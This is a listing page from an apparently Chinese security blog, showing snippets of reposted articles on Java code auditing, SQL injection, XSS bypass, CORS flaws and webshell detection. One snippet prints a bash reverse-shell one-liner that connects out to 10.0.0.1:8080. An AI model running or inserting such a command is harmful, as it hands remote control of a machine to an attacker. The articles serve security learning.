包含"java"的全部内容
【转】【JSP代码审计】某商城几处漏洞审计分析-安全小百科

【转】【JSP代码审计】某商城几处漏洞审计分析

0x00 前言 前段时间在测试某商城系统时,发现使用了某通用CMS,本着学习的态度,于是下载下来对源码进行分析。 因为自己懒得搭环境,喜欢实战环境,所以直接找官方Demo,因为漏洞提交至今未修复...
admin的头像-安全小百科admin3年前
0210
JAVA代码审计之团队CMS v1.0-安全小百科

JAVA代码审计之团队CMS v1.0

这个cms功能比较少,测试点也不算很多,主要还是想通过读一些jsp源码来认识整个java web的架构! 整个审计流程比较简单,,重在流程和思路! cms简介: 团队CMS网站是一个以jsp+mysql进行开发的j...
admin的头像-安全小百科admin3年前
0190
【转】JSONP与CORS漏洞挖掘-安全小百科

【转】JSONP与CORS漏洞挖掘

前言 本文从笔者自己对同源策略的理解来谈谈与之相关的JSONP劫持和CORS错误配置这两类安全问题。 同源策略(SOP) 同源策略限制从一个源加载的文档或脚本与来自另一个源的资源进行交互,这是一个用...
admin的头像-安全小百科admin3年前
0220
【转】某租车系统JAVA代码审计-安全小百科

【转】某租车系统JAVA代码审计

*本文原创作者:ADog,属于FreeBuf原创奖励计划,未经许可禁止转载 前言 由于开源的JAVA WEB项目不是很多,这里找到一个没有用struct2或是spring框架的cms,希望借此cms来帮助新手敲开JAVA代码...
admin的头像-安全小百科admin3年前
0270
【转】MySQL时间盲注五种延时方法-安全小百科

【转】MySQL时间盲注五种延时方法

author:cdxy PWNHUB 一道盲注题过滤了常规的sleep和benchmark函数,引发对时间盲注中延时方法的思考。 延时函数 mysql> select sleep(5); +----------+ | sleep(5) ...
admin的头像-安全小百科admin3年前
0130
【转】某次XSS绕过总结-安全小百科

【转】某次XSS绕过总结

To:znn 0x01 背景 前段时间苏宁src五倍积分,想着无事刷一刷玩玩,碰到一个反射型XSS,如下图: 插入<img src=a>测试正常(此处截图遗失,漏洞已修补),证明存在XSS,但是过滤了许多关...
admin的头像-安全小百科admin3年前
090
【转】Linux下反弹shell方法-安全小百科

【转】Linux下反弹shell方法

author:waitalone 1.bash版本 bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 1 bash -i >& /dev/tcp/10.0.0.1/8...
admin的头像-安全小百科admin3年前
0120
基于AST的Webshell检测-安全小百科

基于AST的Webshell检测

前言 想了好久的题目,不知道该用什么样的标题去吸引人,webshell的检测研究已经有很多文章披露了,在兜哥的机器学习书中也被反复作为案例提及,这里Webshell检测都是基于文件特征的,并不是基...
admin的头像-安全小百科admin3年前
0100
帆软10.0 Getshell漏洞分析-安全小百科

帆软10.0 Getshell漏洞分析

前言 由于帆软10.0报表系统前台只有一个登陆口,并且10.0的认证机制做了很大的改动,想要通过文件读取或者其他漏洞来获取管理员信息几乎不可能,所以下面所述的几个漏洞都是需要用户登录权限。g...
admin的头像-安全小百科admin3年前
011660
基于机器学习的jsp/jspx webshell检测-安全小百科

基于机器学习的jsp/jspx webshell检测

前言 在上文《基于AST的Webshell检测》中,笔者已经提出了基于抽象语法树是可以用来检测Webshell的,那么如何将这种思想应用在jsp/jspx的webshell检测便是本文讨论的重点。 简单回顾下抽象语法...
admin的头像-安全小百科admin3年前
0110